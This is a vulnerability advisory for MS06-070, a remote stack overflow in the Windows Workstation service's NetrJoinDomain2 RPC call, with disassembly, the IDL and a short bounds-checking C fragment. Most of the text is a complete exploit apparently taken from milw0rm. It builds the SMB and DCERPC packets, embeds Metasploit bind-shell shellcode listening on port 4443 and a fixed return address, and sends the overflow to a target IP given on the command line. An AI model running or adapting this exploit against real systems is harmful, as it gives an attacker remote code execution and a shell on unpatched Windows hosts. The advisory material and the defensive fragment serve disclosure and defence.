Microsoft Security Bulletin MS06-070
Vulnerability in Workstation Service Could Allow Remote Code Execution (924270)
Release Date: November 14, 2006
Version: 1.0
Summary
Who should read this document: Customers who use Microsoft Windows
Impact of vulnerability: remote code execution
Maximum severity rating: Critical
Recommendation: customers should apply the update immediately
Tested Software and Security Update Download Locations:
Affected Software:
• Microsoft Windows 2000 Service Pack 4 - Download the update
• Microsoft Windows XP Service Pack 2 - Download the update
Non-Affected Software:
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 SP1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
BUGTRAQ ID: 20985
CVE(CAN) ID: CVE-2006-4691
Microsoft Windows is a very popular operating system released by Microsoft.
The Windows Workstation service component contains a stack overflow vulnerability; a remote attacker who exploits it can execute arbitrary commands on the affected system.
In the Workstation service module named driver.dll, the NetpManageIPCConnect function calls swprintf on a buffer whose length is never checked, and the input buffer is controllable by a remote attacker.
.text:76781D67 mov edi, [ebp+arg_0]
...
.text:76781D90 lea eax, [ebp+var_2CC]
...
.text:76781DA0 push edi
.text:76781DA1 push offset "%ws\\IPC$"
.text:76781DA6 push eax
.text:76781DA7 call ds:swprintf
NetpJoinDomain calls this function, and NetpJoinDomain is in turn reached from the NetrJoinDomain2 function, which is exposed over RPC.
The IDL of NetrJoinDomain2 is as follows:
long _NetrJoinDomain2@28 (
[in][unique][string] wchar_t * arg_1,
[in][string] wchar_t * arg_2,
[in][unique][string] wchar_t * arg_3,
[in][unique][string] wchar_t * arg_4,
[in][unique] struct_C * arg_5,
[in] long arg_6
);
arg_2 contains a string of the form <DomainName> + "\" + <Hostname>.
<Hostname> is used as the first argument of NetpManageIPCConnect. Because this value is attacker-controlled and is ultimately handed to swprintf, an overlong hostname overflows the stack buffer.
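As an added defender's illustration (not code from the advisory, the exploit, or the Windows module it describes), this C fragment shows the same call in bounded form: the hostname is isolated from arg_2 and length-checked against a buffer the size of var_2CC (0x2CC bytes, taken here as 358 UTF-16 units) before the size-checked C99 swprintf builds the IPC$ path. The function names, the 358-unit bound, and the use of the portable %ls in place of Windows' %ws are this example's assumptions.

```c
#include <wchar.h>
/* Stand-in for var_2CC, the 0x2CC-byte stack buffer the vulnerable code formats
   into: 0x2CC / 2 = 358 UTF-16 units, fixed here regardless of sizeof(wchar_t). */
#define IPC_PATH_WCHARS 358

/* Bounded form of the unchecked swprintf: refuse a hostname that cannot fit
   "<host>\IPC$" plus a NUL, then use the size-checked C99 swprintf (which
   returns a negative value on truncation). Returns the number of wide
   characters written, or -1 on rejection with out[0] cleared. */
int build_ipc_path(const wchar_t *hostname, wchar_t *out, size_t out_wchars)
{
    const size_t suffix = wcslen(L"\\IPC$");
    int n = -1;
    if (hostname == NULL || out == NULL || out_wchars == 0)
        return -1;
    if (wcslen(hostname) + suffix < out_wchars)      /* leaves room for the NUL */
        n = swprintf(out, out_wchars, L"%ls\\IPC$", hostname);
    if (n < 0 || (size_t)n >= out_wchars) {
        out[0] = L'\0';
        return -1;
    }
    return n;
}

/* Format into a stack buffer of the original size and report the length. */
int ipc_path_len(const wchar_t *hostname)
{
    wchar_t path[IPC_PATH_WCHARS];
    return build_ipc_path(hostname, path, IPC_PATH_WCHARS);
}

/* arg_2 arrives as "<DomainName>\<Hostname>"; isolate the hostname and validate
   it the same way. -1 when there is no hostname part. */
int validate_join_domain_arg(const wchar_t *arg_2)
{
    const wchar_t *bs = arg_2 ? wcschr(arg_2, L'\\') : NULL;
    if (bs == NULL || bs[1] == L'\0')
        return -1;
    return ipc_path_len(bs + 1);
}

/* Constructed test input: a hostname of n 'A's (capped at 2047). */
const wchar_t *constructed_hostname(size_t n)
{
    static wchar_t buf[2048];
    if (n > 2047) n = 2047;
    for (size_t i = 0; i < n; i++) buf[i] = L'A';
    buf[n] = L'\0';
    return buf;
}
```

A 352-character hostname is the longest that still fits (352 + 5 + NUL = 358); one character more, or the 0x84c/2 characters of filler the exploit below sends, is refused before any formatting happens.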
<*source: JeongWook Matt Oh
Derek Soeder ([email protected])
Links: http://secunia.com/advisories/22883
http://research.eeye.com/html/advisories/published/AD20061114.html
http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx
http://www.us-cert.gov/cas/techalerts/TA06-318A.html
*>
Recommendations:
Temporary workaround:
Vendor patch:
Microsoft
---------
Microsoft has released security bulletin MS06-070 and the corresponding patch:
MS06-070: Vulnerability in Workstation Service Could Allow Remote Code Execution (924270)
Links: http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx
Patch download:
http://www.microsoft.com/downloads/details.aspx?FamilyId=3ad5c57d-d3f6-46a1-8dee-3e16d0977f80
http://www.microsoft.com/downloads/details.aspx?FamilyId=f4c8e767-4ed2-4e36-aa43-612f3017efc7
Exploit code:
/***************************************************************************
Microsoft Windows Driver NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:<http://ruder.cdut.net/default.asp>
Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct the jmp EBX address and fixed the Trojan output status.
Greetz to InTel
Should work on Windows 2000 Server SP4 (All Languages)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live, more information see
<http://research.eeye.com/html/advisories/published/AD20061114.html>,
cocoruder just researched the vulnerability and gives the exploit for
Win2000.
****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")

/* SMB Negotiate Protocol request */
unsigned char SmbNeg[] =
    "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
    "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";

/* SMB Session Setup AndX request (anonymous) */
unsigned char Session_Setup_AndX_Request[] =
    "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
    "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
    "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
    "\x62\x00";

/* SMB Tree Connect AndX request to \\<host>\IPC$ */
unsigned char TreeConnect_AndX_Request[] =
    "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
    "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
    "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
    "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
    "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
    "\x3f\x00";

/* SMB NT Create AndX request opening the \wkssvc named pipe */
unsigned char NTCreate_AndX_Request[] =
    "\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
    "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
    "\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
    "\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
    "\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";

/* DCERPC bind to the wkssvc interface, carried in an SMB Transact */
unsigned char Rpc_Bind_Wkssvc[] =
    "\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
    "\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
    "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
    "\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
    "\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
    "\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
    "\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
    "\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
    "\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";

/* SMB Transact + DCERPC request header for NetrJoinDomain2 */
unsigned char Rpc_NetrJoinDomain2_Header[] =
    "\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
    "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
    "\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
    "\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
    "\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
    "\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
    "\x00\x00\x00\x00"
    "\x16\x00"                      //opnum,NetrJoinDomain2
    "\x30\x2a\x42\x00"
    "\x0e\x00\x00\x00"
    "\x00\x00\x00\x00"
    "\x0e\x00\x00\x00"
    "\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
    "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
    "\x00\x00"
    "\x10\x01\x00\x00"
    "\x00\x00\x00\x00"
    "\x10\x01\x00\x00";

/* Remaining NetrJoinDomain2 parameters (arg_3..arg_6) */
unsigned char Rpc_NetrJoinDomain2_End[] =
    "\x00\x00\x00\x00"
    "\x00\x00\x00\x00"
    "\x00\x00\x00\x00"
    "\x01\x00\x00\x00";

unsigned char *lpDomainName = NULL;
DWORD dwDomainNameLen = 0;

/* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub <http://metasploit.com> */
unsigned char shellcode[] =
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
    "\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
    "\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
    "\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
    "\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
    "\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
    "\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
    "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
    "\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
    "\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
    "\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
    "\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
    "\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
    "\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
    "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
    "\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
    "\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
    "\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
    "\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
    "\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
    "\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
    "\xba\xa6\xf5\x31\x39\x59\x23\xce";

DWORD fill_len_1 = 0x84c;            //fill data
DWORD fill_len_2 = 0x1000;           //fill rubbish data
DWORD addr_jmp_ebx = 0x77F92A9B;     //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[] =          //jmp 8
    "\xEB\x06\x90\x90";
unsigned char *Rpc_NetrJoinDomain2 = NULL;
DWORD dwRpc_NetrJoinDomain2 = 0;
unsigned char recvbuff[2048];

void showinfo(void)
{
    printf("Microsoft Windows Driver NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
    printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
    printf("page:<http://ruder.cdut.net/default.asp>\n\n");
    printf("Code fixed by S A Stevens - 16.11.2006\n");
    printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
    printf("usage:\n");
    printf("ms06070 targetip DomainName\n\n");
    printf("notice:\n");
    printf("Make sure the DomainName is valid and live, more information see\n");
    printf("<http://research.eeye.com/html/advisories/published/AD20061114.html>,\n");
    printf("cocoruder just researched the vulnerability and gives the exploit for Win2000.\n\n\n");
}

/* send the SMB negotiate request */
void neg(int s)
{
    char response[1024];
    memset(response, 0, sizeof(response));
    send(s, (char *)SmbNeg, sizeof(SmbNeg) - 1, 0);
}

/* build the NetrJoinDomain2 request: header, "DomainName\\", filler, return address, shellcode, trailing parameters */
void MakeAttackPacket(char *lpDomainNameStr)
{
    DWORD j, len, b_flag;
    dwDomainNameLen = (strlen(lpDomainNameStr) + 2) * 2;
    lpDomainName = (unsigned char *)malloc(dwDomainNameLen);
    memset(lpDomainName, 0, dwDomainNameLen);
    MultiByteToWideChar(CP_ACP, 0, lpDomainNameStr, -1, (LPWSTR)lpDomainName, dwDomainNameLen);
    *(unsigned char *)(lpDomainName + dwDomainNameLen - 2) = 0x5C;
    *(unsigned char *)(lpDomainName + dwDomainNameLen - 4) = 0x5C;
    len = dwDomainNameLen +          //DomainName
          fill_len_1 - 3 * 2 +       //fill_len_1
          4 +                        //jmp 8
          4 +                        //addr jmp ebx
          sizeof(shellcode) - 1 +    //shellcode
          fill_len_2 +               //fill_len_2
          2;                         //0x0000
    b_flag = 0;
    if (len % 2 == 1)
    {
        len++;
        b_flag = 1;
    }
    dwRpc_NetrJoinDomain2 = sizeof(Rpc_NetrJoinDomain2_Header) - 1 +
                            len +
                            sizeof(Rpc_NetrJoinDomain2_End) - 1;   //end
    //malloc
    Rpc_NetrJoinDomain2 = (unsigned char *)malloc(dwRpc_NetrJoinDomain2);
    if (Rpc_NetrJoinDomain2 == NULL)
    {
        printf("malloc error!\n");
        exit(1);
    }
    //fill the nop
    memset(Rpc_NetrJoinDomain2, 0x90, dwRpc_NetrJoinDomain2);
    j = sizeof(Rpc_NetrJoinDomain2_Header) - 1;
    //update para1 length
    *(DWORD *)(Rpc_NetrJoinDomain2_Header + j - 0x0c) = len / 2;
    *(DWORD *)(Rpc_NetrJoinDomain2_Header + j - 0x04) = len / 2;
    //copy header
    memcpy(Rpc_NetrJoinDomain2, Rpc_NetrJoinDomain2_Header, sizeof(Rpc_NetrJoinDomain2_Header) - 1);
    j = sizeof(Rpc_NetrJoinDomain2_Header) - 1;
    //copy the DomainName
    memcpy(Rpc_NetrJoinDomain2 + j, lpDomainName, dwDomainNameLen);
    j = j + dwDomainNameLen;
    //calculate offset
    j = j + fill_len_1 - 3 * 2;
    //jmp 8
    memcpy(Rpc_NetrJoinDomain2 + j, code_jmp8, sizeof(code_jmp8) - 1);
    j = j + 4;
    //jmp ebx address
    *(DWORD *)(Rpc_NetrJoinDomain2 + j) = addr_jmp_ebx;
    j = j + 4;
    //copy shellcode
    memcpy(Rpc_NetrJoinDomain2 + j, shellcode, sizeof(shellcode) - 1);
    j = j + sizeof(shellcode) - 1;
    //fill data
    memset(Rpc_NetrJoinDomain2 + j, 0x41, fill_len_2);
    j = j + fill_len_2;
    //0x0000(NULL)
    if (b_flag == 0)
    {
        Rpc_NetrJoinDomain2[j] = 0x00;
        Rpc_NetrJoinDomain2[j + 1] = 0x00;
        j = j + 2;
    }
    else if (b_flag == 1)
    {
        Rpc_NetrJoinDomain2[j] = 0x00;
        Rpc_NetrJoinDomain2[j + 1] = 0x00;
        Rpc_NetrJoinDomain2[j + 2] = 0x00;
        j = j + 3;
    }
    //copy other parameter
    memcpy(Rpc_NetrJoinDomain2 + j, Rpc_NetrJoinDomain2_End, sizeof(Rpc_NetrJoinDomain2_End) - 1);
    j = j + sizeof(Rpc_NetrJoinDomain2_End) - 1;
}

void main(int argc, char **argv)
{
    WSADATA ws;
    struct sockaddr_in server;
    SOCKET sock;
    int ret;                         //signed so SOCKET_ERROR (-1) is detected below
    WORD userid, treeid, fid;

    if (argc != 3)
    {
        showinfo();
        return;
    }
    WSAStartup(MAKEWORD(2, 2), &ws);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
    {
        return;
    }
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_port = htons((USHORT)445);
    printf("[+] Connecting %s\n", argv[1]);
    ret = connect(sock, (struct sockaddr *)&server, sizeof(server));
    if (ret == -1)
    {
        printf("Connection Error, Port 445 Firewalled?\n");
        return;
    }
    neg(sock);
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    ret = send(sock, (char *)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        printf("send Session_Setup_AndX_Request error!\n");
        return;
    }
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    userid = *(WORD *)(recvbuff + 0x20);                        //get userid
    memcpy(TreeConnect_AndX_Request + 0x20, (char *)&userid, 2); //update userid
    ret = send(sock, (char *)TreeConnect_AndX_Request, sizeof(TreeConnect_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        printf("send TreeConnect_AndX_Request error!\n");
        return;
    }
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    treeid = *(WORD *)(recvbuff + 0x1c);                        //get treeid
    //send NTCreate_AndX_Request
    memcpy(NTCreate_AndX_Request + 0x20, (char *)&userid, 2);   //update userid
    memcpy(NTCreate_AndX_Request + 0x1c, (char *)&treeid, 2);   //update treeid
    ret = send(sock, (char *)NTCreate_AndX_Request, sizeof(NTCreate_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        printf("send NTCreate_AndX_Request error!\n");
        return;
    }
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    fid = *(WORD *)(recvbuff + 0x2a);                           //get the fid
    //rpc bind
    memcpy(Rpc_Bind_Wkssvc + 0x20, (char *)&userid, 2);
    memcpy(Rpc_Bind_Wkssvc + 0x1c, (char *)&treeid, 2);
    memcpy(Rpc_Bind_Wkssvc + 0x43, (char *)&fid, 2);
    *(DWORD *)Rpc_Bind_Wkssvc = htonl(sizeof(Rpc_Bind_Wkssvc) - 1 - 4);
    ret = send(sock, (char *)Rpc_Bind_Wkssvc, sizeof(Rpc_Bind_Wkssvc) - 1, 0);
    if (ret <= 0)
    {
        printf("send Rpc_Bind_Wkssvc error!\n");
        return;
    }
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    MakeAttackPacket((char *)argv[2]);
    memcpy(Rpc_NetrJoinDomain2 + 0x20, (char *)&userid, 2);
    memcpy(Rpc_NetrJoinDomain2 + 0x1c, (char *)&treeid, 2);
    memcpy(Rpc_NetrJoinDomain2 + 0x43, (char *)&fid, 2);
    *(DWORD *)Rpc_NetrJoinDomain2 = htonl(dwRpc_NetrJoinDomain2 - 4);
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x27) = dwRpc_NetrJoinDomain2 - 0x58; //update Total Data Count
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x3b) = dwRpc_NetrJoinDomain2 - 0x58; //update the Data Count
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x45) = dwRpc_NetrJoinDomain2 - 0x47; //update Byte Count
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x60) = dwRpc_NetrJoinDomain2 - 0x58; //update Frag Length
    ret = send(sock, (char *)Rpc_NetrJoinDomain2, dwRpc_NetrJoinDomain2, 0);
    if (ret <= 0)
    {
        printf("send Rpc_NetrJoinDomain2 error!\n");
        return;
    }
    printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n", argv[1]);
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    closesocket(sock);
}
// milw0rm.com [2006-11-17]